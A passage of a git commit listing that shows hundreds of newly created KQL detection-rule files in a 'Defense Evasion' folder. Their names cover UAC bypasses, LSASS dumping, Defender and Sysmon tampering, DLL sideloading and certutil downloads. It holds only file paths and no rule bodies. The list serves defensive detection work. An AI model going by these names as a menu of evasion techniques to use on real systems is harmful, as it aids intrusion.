KQL/rules/Defense Evasion/potential_commandline_obfuscation_using_escape_characters.kql create mode 100644 KQL/rules/Defense Evasion/potential_commandline_obfuscation_using_unicode_characters_from_suspicious_image.kql create mode 100644 KQL/rules/Defense Evasion/potential_data_stealing_via_chromium_headless_debugging.kql create mode 100644 KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_1.kql create mode 100644 KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_2.kql create mode 100644 KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_3.kql create mode 100644 KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_4.kql create mode 100644 KQL/rules/Defense Evasion/potential_defense_evasion_via_binary_rename.kql create mode 100644 KQL/rules/Defense Evasion/potential_defense_evasion_via_rename_of_highly_relevant_binaries.kql create mode 100644 KQL/rules/Defense Evasion/potential_defense_evasion_via_right_to_left_override.kql create mode 100644 KQL/rules/Defense Evasion/potential_dll_sideloading_of_dbgcore_dll.kql create mode 100644 KQL/rules/Defense Evasion/potential_dll_sideloading_of_dbghelp_dll.kql create mode 100644 KQL/rules/Defense Evasion/potential_dll_sideloading_of_libcurl_dll_via_gup_exe.kql create mode 100644 KQL/rules/Defense Evasion/potential_dll_sideloading_via_classicexplorer32_dll.kql create mode 100644 KQL/rules/Defense Evasion/potential_dll_sideloading_via_comctl32_dll.kql create mode 100644 KQL/rules/Defense Evasion/potential_dll_sideloading_via_jsschhlp.kql create mode 100644 KQL/rules/Defense Evasion/potential_encoded_powershell_patterns_in_commandline.kql create mode 100644 KQL/rules/Defense Evasion/potential_eventlog_file_location_tampering.kql create mode 100644 KQL/rules/Defense Evasion/potential_fake_instance_of_hxtsr_exe_executed.kql create mode 100644 KQL/rules/Defense Evasion/potential_file_download_via_ms_appinstaller_protocol_handler.kql create mode 100644 KQL/rules/Defense Evasion/potential_hidden_directory_creation_via_ntfs_index_allocation_stream.kql create mode 100644 KQL/rules/Defense Evasion/potential_hidden_directory_creation_via_ntfs_index_allocation_stream_cli.kql create mode 100644 KQL/rules/Defense Evasion/potential_homoglyph_attack_using_lookalike_characters.kql create mode 100644 KQL/rules/Defense Evasion/potential_homoglyph_attack_using_lookalike_characters_in_filename.kql create mode 100644 KQL/rules/Defense Evasion/potential_lethalhta_technique_execution.kql create mode 100644 KQL/rules/Defense Evasion/potential_libvlc_dll_sideloading.kql create mode 100644 KQL/rules/Defense Evasion/potential_lsass_process_dump_via_procdump.kql create mode 100644 KQL/rules/Defense Evasion/potential_manage_bde_wsf_abuse_to_proxy_execution.kql create mode 100644 KQL/rules/Defense Evasion/potential_memory_dumping_activity_via_livekd.kql create mode 100644 KQL/rules/Defense Evasion/potential_meterpreter_cobaltstrike_activity.kql create mode 100644 KQL/rules/Defense Evasion/potential_mftrace_exe_abuse.kql create mode 100644 KQL/rules/Defense Evasion/potential_msiexec_masquerading.kql create mode 100644 KQL/rules/Defense Evasion/potential_ntlm_coercion_via_certutil_exe.kql create mode 100644 KQL/rules/Defense Evasion/potential_obfuscated_ordinal_call_via_rundll32.kql create mode 100644 KQL/rules/Defense Evasion/potential_password_spraying_attempt_using_dsacls_exe.kql create mode 100644 KQL/rules/Defense Evasion/potential_pendingfilerenameoperations_tampering.kql create mode 100644 KQL/rules/Defense Evasion/potential_persistence_via_outlook_home_page.kql create mode 100644 KQL/rules/Defense Evasion/potential_persistence_via_outlook_today_page.kql create mode 100644 KQL/rules/Defense Evasion/potential_powershell_downgrade_attack.kql create mode 100644 KQL/rules/Defense Evasion/potential_powershell_execution_policy_tampering.kql create mode 100644 KQL/rules/Defense Evasion/potential_powershell_execution_policy_tampering_proccreation.kql create mode 100644 KQL/rules/Defense Evasion/potential_powershell_execution_via_dll.kql create mode 100644 KQL/rules/Defense Evasion/potential_powershell_obfuscation_via_reversed_commands.kql create mode 100644 KQL/rules/Defense Evasion/potential_privilege_escalation_attempt_via_exe_local_technique.kql create mode 100644 KQL/rules/Defense Evasion/potential_process_execution_proxy_via_cl_invocation_ps1.kql create mode 100644 KQL/rules/Defense Evasion/potential_provisioning_registry_key_abuse_for_binary_proxy_execution.kql create mode 100644 KQL/rules/Defense Evasion/potential_provisioning_registry_key_abuse_for_binary_proxy_execution_reg.kql create mode 100644 KQL/rules/Defense Evasion/potential_provlaunch_exe_binary_proxy_execution_abuse.kql create mode 100644 KQL/rules/Defense Evasion/potential_ransomware_or_unauthorized_mbr_tampering_via_bcdedit_exe.kql create mode 100644 KQL/rules/Defense Evasion/potential_register_app_vbs_lolscript_abuse.kql create mode 100644 KQL/rules/Defense Evasion/potential_regsvr32_commandline_flag_anomaly.kql create mode 100644 KQL/rules/Defense Evasion/potential_rundll32_execution_with_dll_stored_in_ads.kql create mode 100644 KQL/rules/Defense Evasion/potential_script_proxy_execution_via_cl_mutexverifiers_ps1.kql create mode 100644 KQL/rules/Defense Evasion/potential_signing_bypass_via_windows_developer_features.kql create mode 100644 KQL/rules/Defense Evasion/potential_signing_bypass_via_windows_developer_features_registry.kql create mode 100644 KQL/rules/Defense Evasion/potential_suspicious_mofcomp_execution.kql create mode 100644 KQL/rules/Defense Evasion/potential_suspicious_windows_feature_enabled_proccreation.kql create mode 100644 KQL/rules/Defense Evasion/potential_sysinternals_procdump_evasion.kql create mode 100644 KQL/rules/Defense Evasion/potential_system_dll_sideloading_from_non_system_locations.kql create mode 100644 KQL/rules/Defense Evasion/potential_tampering_with_security_products_via_wmic.kql create mode 100644 KQL/rules/Defense Evasion/potential_wazuh_security_platform_dll_sideloading.kql create mode 100644 KQL/rules/Defense Evasion/potential_werfault_reflectdebugger_registry_value_abuse.kql create mode 100644 KQL/rules/Defense Evasion/potential_windows_defender_tampering_via_wmic_exe.kql create mode 100644 KQL/rules/Defense Evasion/potential_winnti_dropper_activity.kql create mode 100644 KQL/rules/Defense Evasion/potentially_over_permissive_permissions_granted_using_dsacls_exe.kql create mode 100644 KQL/rules/Defense Evasion/potentially_suspicious_asp_net_compilation_via_aspnetcompiler.kql create mode 100644 KQL/rules/Defense Evasion/potentially_suspicious_cabinet_file_expansion.kql create mode 100644 KQL/rules/Defense Evasion/potentially_suspicious_call_to_win32_nteventlogfile_class.kql create mode 100644 KQL/rules/Defense Evasion/potentially_suspicious_child_process_of_diskshadow_exe.kql create mode 100644 KQL/rules/Defense Evasion/potentially_suspicious_child_process_of_regsvr32.kql create mode 100644 KQL/rules/Defense Evasion/potentially_suspicious_child_processes_spawned_by_conhost.kql create mode 100644 KQL/rules/Defense Evasion/potentially_suspicious_cmd_shell_output_redirect.kql create mode 100644 KQL/rules/Defense Evasion/potentially_suspicious_dll_registered_via_odbcconf_exe.kql create mode 100644 KQL/rules/Defense Evasion/potentially_suspicious_dmp_hdmp_file_creation.kql create mode 100644 KQL/rules/Defense Evasion/potentially_suspicious_event_viewer_child_process.kql create mode 100644 KQL/rules/Defense Evasion/potentially_suspicious_execution_from_parent_process_in_public_folder.kql create mode 100644 KQL/rules/Defense Evasion/potentially_suspicious_execution_from_tmp_folder.kql create mode 100644 KQL/rules/Defense Evasion/potentially_suspicious_execution_of_regasm_regsvcs_from_uncommon_location.kql create mode 100644 KQL/rules/Defense Evasion/potentially_suspicious_execution_of_regasm_regsvcs_with_uncommon_extension.kql create mode 100644 KQL/rules/Defense Evasion/potentially_suspicious_googleupdate_child_process.kql create mode 100644 KQL/rules/Defense Evasion/potentially_suspicious_office_document_executed_from_trusted_location.kql create mode 100644 KQL/rules/Defense Evasion/potentially_suspicious_ping_copy_command_combination.kql create mode 100644 KQL/rules/Defense Evasion/potentially_suspicious_regsvr32_http_ftp_pattern.kql create mode 100644 KQL/rules/Defense Evasion/potentially_suspicious_regsvr32_http_ip_pattern.kql create mode 100644 KQL/rules/Defense Evasion/potentially_suspicious_rundll32_activity.kql create mode 100644 KQL/rules/Defense Evasion/potentially_suspicious_rundll32_exe_execution_of_udl_file.kql create mode 100644 KQL/rules/Defense Evasion/potentially_suspicious_volume_shadow_copy_vsstrace_dll_load.kql create mode 100644 KQL/rules/Defense Evasion/potentially_suspicious_wdac_policy_file_creation.kql create mode 100644 KQL/rules/Defense Evasion/potentially_suspicious_windows_app_activity.kql create mode 100644 KQL/rules/Defense Evasion/potentially_suspicious_wuauclt_network_connection.kql create mode 100644 KQL/rules/Defense Evasion/powershell_base64_encoded_frombase64string_cmdlet.kql create mode 100644 KQL/rules/Defense Evasion/powershell_base64_encoded_mppreference_cmdlet.kql create mode 100644 KQL/rules/Defense Evasion/powershell_console_history_logs_deleted.kql create mode 100644 KQL/rules/Defense Evasion/powershell_core_dll_loaded_via_office_application.kql create mode 100644 KQL/rules/Defense Evasion/powershell_defender_disable_scan_feature.kql create mode 100644 KQL/rules/Defense Evasion/powershell_defender_exclusion.kql create mode 100644 KQL/rules/Defense Evasion/powershell_defender_threat_severity_default_action_set_to_allow_or_noaction_.kql create mode 100644 KQL/rules/Defense Evasion/powershell_executed_from_headless_conhost_process.kql create mode 100644 KQL/rules/Defense Evasion/powershell_logging_disabled_via_registry_key_tampering.kql create mode 100644 KQL/rules/Defense Evasion/powershell_script_change_permission_via_set_acl.kql create mode 100644 KQL/rules/Defense Evasion/powershell_set_acl_on_windows_folder.kql create mode 100644 KQL/rules/Defense Evasion/powershell_token_obfuscation_process_creation.kql create mode 100644 KQL/rules/Defense Evasion/prefetch_file_deleted.kql create mode 100644 KQL/rules/Defense Evasion/procdump_execution.kql create mode 100644 KQL/rules/Defense Evasion/process_access_via_trolleyexpress_exclusion.kql create mode 100644 KQL/rules/Defense Evasion/process_creation_using_sysnative_folder.kql create mode 100644 KQL/rules/Defense Evasion/process_execution_from_a_potentially_suspicious_folder.kql create mode 100644 KQL/rules/Defense Evasion/process_launched_without_image_name.kql create mode 100644 KQL/rules/Defense Evasion/process_memory_dump_via_comsvcs_dll.kql create mode 100644 KQL/rules/Defense Evasion/process_memory_dump_via_dotnet_dump.kql create mode 100644 KQL/rules/Defense Evasion/process_proxy_execution_via_squirrel_exe.kql create mode 100644 KQL/rules/Defense Evasion/proxy_execution_via_vshadow.kql create mode 100644 KQL/rules/Defense Evasion/proxy_execution_via_wuauclt_exe.kql create mode 100644 KQL/rules/Defense Evasion/psscriptpolicytest_creation_by_uncommon_process.kql create mode 100644 KQL/rules/Defense Evasion/pua_advancedrun_suspicious_execution.kql create mode 100644 KQL/rules/Defense Evasion/pua_cleanwipe_execution.kql create mode 100644 KQL/rules/Defense Evasion/pua_defendercheck_execution.kql create mode 100644 KQL/rules/Defense Evasion/pua_potential_pe_metadata_tamper_using_rcedit.kql create mode 100644 KQL/rules/Defense Evasion/pua_process_hacker_execution.kql create mode 100644 KQL/rules/Defense Evasion/publisher_attachment_file_dropped_in_suspicious_location.kql create mode 100644 KQL/rules/Defense Evasion/pubprn_vbs_proxy_execution.kql create mode 100644 KQL/rules/Defense Evasion/python_function_execution_security_warning_disabled_in_excel.kql create mode 100644 KQL/rules/Defense Evasion/python_function_execution_security_warning_disabled_in_excel_registry.kql create mode 100644 KQL/rules/Defense Evasion/python_image_load_by_non_python_process.kql create mode 100644 KQL/rules/Defense Evasion/raccine_uninstall.kql create mode 100644 KQL/rules/Defense Evasion/rdp_connection_allowed_via_netsh_exe.kql create mode 100644 KQL/rules/Defense Evasion/rdp_sensitive_settings_changed.kql create mode 100644 KQL/rules/Defense Evasion/rdp_sensitive_settings_changed_to_zero.kql create mode 100644 KQL/rules/Defense Evasion/regasm_exe_execution_without_commandline_flags_or_files.kql create mode 100644 KQL/rules/Defense Evasion/regasm_exe_initiating_network_connection_to_public_ip.kql create mode 100644 KQL/rules/Defense Evasion/regedit_as_trusted_installer.kql create mode 100644 KQL/rules/Defense Evasion/register_app_vbs_proxy_execution.kql create mode 100644 KQL/rules/Defense Evasion/registry_entries_for_azorult_malware.kql create mode 100644 KQL/rules/Defense Evasion/registry_persistence_via_service_in_safe_mode.kql create mode 100644 KQL/rules/Defense Evasion/regsvr32_dll_execution_with_suspicious_file_extension.kql create mode 100644 KQL/rules/Defense Evasion/regsvr32_execution_from_highly_suspicious_location.kql create mode 100644 KQL/rules/Defense Evasion/regsvr32_execution_from_potential_suspicious_location.kql create mode 100644 KQL/rules/Defense Evasion/remote_access_tool_rurat_execution_from_unusual_location.kql create mode 100644 KQL/rules/Defense Evasion/remote_chm_file_download_execution_via_hh_exe.kql create mode 100644 KQL/rules/Defense Evasion/remote_code_execute_via_winrm_vbs.kql create mode 100644 KQL/rules/Defense Evasion/remote_file_download_via_findstr_exe.kql create mode 100644 KQL/rules/Defense Evasion/remote_xsl_execution_via_msxsl_exe.kql create mode 100644 KQL/rules/Defense Evasion/remotefxvgpudisablement_abuse_via_atomictestharnesses.kql create mode 100644 KQL/rules/Defense Evasion/remotely_hosted_hta_file_executed_via_mshta_exe.kql create mode 100644 KQL/rules/Defense Evasion/removal_of_amsi_provider_registry_keys.kql create mode 100644 KQL/rules/Defense Evasion/removal_of_index_value_to_hide_schedule_task_registry.kql create mode 100644 KQL/rules/Defense Evasion/removal_of_sd_value_to_hide_schedule_task_registry.kql create mode 100644 KQL/rules/Defense Evasion/remove_immutable_file_attribute.kql create mode 100644 KQL/rules/Defense Evasion/remove_scheduled_cron_task_job.kql create mode 100644 KQL/rules/Defense Evasion/renamed_autohotkey_exe_execution.kql create mode 100644 KQL/rules/Defense Evasion/renamed_boinc_client_execution.kql create mode 100644 KQL/rules/Defense Evasion/renamed_createdump_utility_execution.kql create mode 100644 KQL/rules/Defense Evasion/renamed_mavinject_exe_execution.kql create mode 100644 KQL/rules/Defense Evasion/renamed_megasync_execution.kql create mode 100644 KQL/rules/Defense Evasion/renamed_microsoft_teams_execution.kql create mode 100644 KQL/rules/Defense Evasion/renamed_msdt_exe_execution.kql create mode 100644 KQL/rules/Defense Evasion/renamed_office_binary_execution.kql create mode 100644 KQL/rules/Defense Evasion/renamed_plink_execution.kql create mode 100644 KQL/rules/Defense Evasion/renamed_procdump_execution.kql create mode 100644 KQL/rules/Defense Evasion/renamed_remote_utilities_rat_rurat_execution.kql create mode 100644 KQL/rules/Defense Evasion/response_file_execution_via_odbcconf_exe.kql create mode 100644 KQL/rules/Defense Evasion/root_certificate_installed_from_susp_locations.kql create mode 100644 KQL/rules/Defense Evasion/run_powershell_script_from_ads.kql create mode 100644 KQL/rules/Defense Evasion/run_powershell_script_from_redirected_input_stream.kql create mode 100644 KQL/rules/Defense Evasion/rundll32_execution_with_uncommon_dll_extension.kql create mode 100644 KQL/rules/Defense Evasion/rundll32_execution_without_commandline_parameters.kql create mode 100644 KQL/rules/Defense Evasion/rundll32_installscreensaver_execution.kql create mode 100644 KQL/rules/Defense Evasion/rundll32_internet_connection.kql create mode 100644 KQL/rules/Defense Evasion/rundll32_spawned_via_explorer_exe.kql create mode 100644 KQL/rules/Defense Evasion/rundll32_spawning_explorer.kql create mode 100644 KQL/rules/Defense Evasion/rundll32_unc_path_execution.kql create mode 100644 KQL/rules/Defense Evasion/runmru_registry_key_deletion.kql create mode 100644 KQL/rules/Defense Evasion/runmru_registry_key_deletion_registry.kql create mode 100644 KQL/rules/Defense Evasion/safeboot_registry_key_deleted_via_reg_exe.kql create mode 100644 KQL/rules/Defense Evasion/scr_file_write_event.kql create mode 100644 KQL/rules/Defense Evasion/screensaver_registry_key_set.kql create mode 100644 KQL/rules/Defense Evasion/scripted_diagnostics_turn_off_check_enabled_registry.kql create mode 100644 KQL/rules/Defense Evasion/scripting_commandline_process_spawned_regsvr32.kql create mode 100644 KQL/rules/Defense Evasion/sdclt_child_processes.kql create mode 100644 KQL/rules/Defense Evasion/sdiagnhost_calling_suspicious_child_process.kql create mode 100644 KQL/rules/Defense Evasion/security_service_disabled_via_reg_exe.kql create mode 100644 KQL/rules/Defense Evasion/self_extracting_package_creation_via_iexpress_exe_from_potentially_suspicious_location.kql create mode 100644 KQL/rules/Defense Evasion/self_extraction_directive_file_created_in_potentially_suspicious_location.kql create mode 100644 KQL/rules/Defense Evasion/service_registry_key_deleted_via_reg_exe.kql create mode 100644 KQL/rules/Defense Evasion/set_suspicious_files_as_system_files_using_attrib_exe.kql create mode 100644 KQL/rules/Defense Evasion/setuid_and_setgid.kql create mode 100644 KQL/rules/Defense Evasion/shadow_copies_deletion_using_operating_systems_utilities.kql create mode 100644 KQL/rules/Defense Evasion/shell32_dll_execution_in_suspicious_directory.kql create mode 100644 KQL/rules/Defense Evasion/space_after_filename_macos.kql create mode 100644 KQL/rules/Defense Evasion/start_of_nt_virtual_dos_machine.kql create mode 100644 KQL/rules/Defense Evasion/suspect_svchost_activity.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_advpack_call_via_rundll32_exe.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_agentexecutor_powershell_execution.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_application_allowed_through_exploit_guard.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_bitlocker_access_agent_update_utility_execution.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_cabinet_file_execution_via_msdt_exe.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_calculator_usage.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_child_process_created_as_system.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_child_process_of_aspnetcompiler.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_child_process_of_wermgr_exe.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_codepage_switch_via_chcp.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_control_panel_dll_load.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_copy_from_or_to_system_directory.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_creation_with_colorcpl.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_customshellhost_execution.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_diantz_alternate_data_stream_execution.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_dll_loaded_via_certoc_exe.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_double_extension_files.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_download_from_direct_ip_via_bitsadmin.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_download_from_file_sharing_website_via_bitsadmin.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_download_via_certutil_exe.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_driver_dll_installation_via_odbcconf_exe.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_dumpminitool_execution.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_environment_variable_has_been_registered.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_eventlog_clearing_or_configuration_change_activity.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_executable_file_creation.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_execution_of_installutil_without_log.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_extrac32_alternate_data_stream_execution.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_file_created_via_onenote_application.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_file_creation_in_uncommon_appdata_folder.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_file_downloaded_from_direct_ip_via_certutil_exe.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_file_downloaded_from_file_sharing_website_via_certutil_exe.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_file_encoded_to_base64_via_certutil_exe.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_files_in_default_gpo_folder.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_hh_exe_execution.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_high_integritylevel_conhost_legacy_option.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_iis_url_globalrules_rewrite_via_appcmd.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_javascript_execution_via_mshta_exe.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_lnk_double_extension_file_created.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_microsoft_office_child_process.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_msbuild_execution_by_uncommon_parent_process.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_msdt_parent_process.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_mshta_child_process.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_msiexec_embedding_parent.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_msiexec_execute_arbitrary_dll.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_msiexec_quiet_install_from_remote_location.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_network_connection_binary_no_commandline.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_obfuscated_powershell_code.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_package_installed_linux.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_parent_double_extension_file_execution.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_path_in_keyboard_layout_ime_file_registry_value.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_ping_del_command_combination.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_powercfg_execution_to_change_lock_screen_timeout.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_powershell_invocations_specific_processcreation.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_process_masquerading_as_svchost_exe.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_process_parents.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_process_start_locations.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_process_suspension_via_werfaultsecure_through_edr_freeze.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_procexp152_sys_file_created_in_tmp.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_program_location_whitelisted_in_firewall_via_netsh_exe.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_provlaunch_exe_child_process.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_rasdial_activity.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_recursive_takeown.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_regsvr32_execution_from_remote_share.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_response_file_execution_via_odbcconf_exe.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_rundll32_activity_invoking_sys_file.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_rundll32_execution_with_image_extension.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_rundll32_setupapi_dll_activity.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_service_binary_directory.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_service_installed.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_shellexec_rundll_call_via_ordinal.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_speech_runtime_binary_child_process.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_splwow64_without_params.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_uninstall_of_windows_defender_feature_via_powershell.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_usage_of_shellexec_rundll.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_volume_shadow_copy_vss_ps_dll_load.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_volume_shadow_copy_vssapi_dll_load.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_vsls_agent_command_with_agentextensionpath_load.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_windows_defender_folder_exclusion_added_via_reg_exe.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_windows_defender_registry_key_tampering_via_reg_exe.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_windows_service_tampering.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_windows_trace_etw_session_tamper_via_logman_exe.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_windows_update_agent_empty_cmdline.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_wordpad_outbound_connections.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_workstation_locking_via_rundll32.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_x509enrollment_process_creation.kql create mode 100644 KQL/rules/Defense Evasion/suspicious_xor_encoded_powershell_command.kql create mode 100644 KQL/rules/Defense Evasion/syncappvpublishingserver_execute_arbitrary_powershell_code.kql create mode 100644 KQL/rules/Defense Evasion/syncappvpublishingserver_vbs_execute_arbitrary_powershell_code.kql create mode 100644 KQL/rules/Defense Evasion/sysinternals_pssuspend_suspicious_execution.kql create mode 100644 KQL/rules/Defense Evasion/syslog_clearing_or_removal_via_system_utilities.kql create mode 100644 KQL/rules/Defense Evasion/sysmon_configuration_update.kql create mode 100644 KQL/rules/Defense Evasion/sysmon_driver_altitude_change.kql create mode 100644 KQL/rules/Defense Evasion/sysmon_driver_unloaded_via_fltmc_exe.kql create mode 100644 KQL/rules/Defense Evasion/system_control_panel_item_loaded_from_uncommon_location.kql create mode 100644 KQL/rules/Defense Evasion/system_file_execution_location_anomaly.kql create mode 100644 KQL/rules/Defense Evasion/system_information_discovery_via_sysctl_macos.kql create mode 100644 KQL/rules/Defense Evasion/tamper_windows_defender_remove_mppreference.kql create mode 100644 KQL/rules/Defense Evasion/tamper_with_sophos_av_registry_keys.kql create mode 100644 KQL/rules/Defense Evasion/taskkill_symantec_endpoint_protection.kql create mode 100644 KQL/rules/Defense Evasion/taskmgr_as_local_system.kql create mode 100644 KQL/rules/Defense Evasion/teamviewer_log_file_deleted.kql create mode 100644 KQL/rules/Defense Evasion/third_party_software_dll_sideloading.kql create mode 100644 KQL/rules/Defense Evasion/time_travel_debugging_utility_usage.kql create mode 100644 KQL/rules/Defense Evasion/time_travel_debugging_utility_usage_image.kql create mode 100644 KQL/rules/Defense Evasion/tomcat_webserver_logs_deleted.kql create mode 100644 KQL/rules/Defense Evasion/touch_suspicious_service_file.kql create mode 100644 KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_default_lockfile.kql create mode 100644 KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_execve_hijack.kql create mode 100644 KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_install_commands.kql create mode 100644 KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_file.kql create mode 100644 KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_process.kql create mode 100644 KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_registry.kql create mode 100644 KQL/rules/Defense Evasion/uac_bypass_tools_using_computerdefaults.kql create mode 100644 KQL/rules/Defense Evasion/uac_bypass_using_changepk_and_slui.kql create mode 100644 KQL/rules/Defense Evasion/uac_bypass_using_consent_and_comctl32_file.kql create mode 100644 KQL/rules/Defense Evasion/uac_bypass_using_consent_and_comctl32_process.kql create mode 100644 KQL/rules/Defense Evasion/uac_bypass_using_disk_cleanup.kql create mode 100644 KQL/rules/Defense Evasion/uac_bypass_using_dismhost.kql create mode 100644 KQL/rules/Defense Evasion/uac_bypass_using_event_viewer_recentviews.kql create mode 100644 KQL/rules/Defense Evasion/uac_bypass_using_eventvwr.kql create mode 100644 KQL/rules/Defense Evasion/uac_bypass_using_ieinstal_file.kql create mode 100644 KQL/rules/Defense Evasion/uac_bypass_using_ieinstal_process.kql create mode 100644 KQL/rules/Defense Evasion/uac_bypass_using_iscsicpl_imageload.kql create mode 100644 KQL/rules/Defense Evasion/uac_bypass_using_msconfig_token_modification_file.kql create mode 100644 KQL/rules/Defense Evasion/uac_bypass_using_msconfig_token_modification_process.kql create mode 100644 KQL/rules/Defense Evasion/uac_bypass_using_net_code_profiler_on_mmc.kql create mode 100644 KQL/rules/Defense Evasion/uac_bypass_using_ntfs_reparse_point_file.kql create mode 100644 KQL/rules/Defense Evasion/uac_bypass_using_ntfs_reparse_point_process.kql create mode 100644 KQL/rules/Defense Evasion/uac_bypass_using_pkgmgr_and_dism.kql create mode 100644 KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_file.kql create mode 100644 KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_process.kql create mode 100644 KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_registry.kql create mode 100644 KQL/rules/Defense Evasion/uac_bypass_via_event_viewer.kql create mode 100644 KQL/rules/Defense Evasion/uac_bypass_via_icmluautil.kql create mode 100644 KQL/rules/Defense Evasion/uac_bypass_via_sdclt.kql create mode 100644 KQL/rules/Defense Evasion/uac_bypass_via_windows_firewall_snap_in_hijack.kql create mode 100644 KQL/rules/Defense Evasion/uac_bypass_via_wsreset.kql create mode 100644 KQL/rules/Defense Evasion/uac_bypass_wsreset.kql create mode 100644 KQL/rules/Defense Evasion/ufw_force_stop_using_ufw_init.kql create mode 100644 KQL/rules/Defense Evasion/uncommon_addinutil_exe_commandline_execution.kql create mode 100644 KQL/rules/Defense Evasion/uncommon_assistive_technology_applications_execution_via_atbroker_exe.kql create mode 100644 KQL/rules/Defense Evasion/uncommon_child_process_of_addinutil_exe.kql create mode 100644 KQL/rules/Defense Evasion/uncommon_child_process_of_appvlp_exe.kql create mode 100644 KQL/rules/Defense Evasion/uncommon_child_process_of_defaultpack_exe.kql create mode 100644 KQL/rules/Defense Evasion/uncommon_child_process_of_setres_exe.kql create mode 100644 KQL/rules/Defense Evasion/uncommon_child_process_spawned_by_odbcconf_exe.kql create mode 100644 KQL/rules/Defense Evasion/uncommon_extension_in_keyboard_layout_ime_file_registry_value.kql create mode 100644 KQL/rules/Defense Evasion/uncommon_file_creation_by_mysql_daemon_process.kql create mode 100644 KQL/rules/Defense Evasion/uncommon_filesystem_load_attempt_by_format_com.kql create mode 100644 KQL/rules/Defense Evasion/uncommon_link_exe_parent_process.kql create mode 100644 KQL/rules/Defense Evasion/uncommon_outbound_kerberos_connection.kql create mode 100644 KQL/rules/Defense 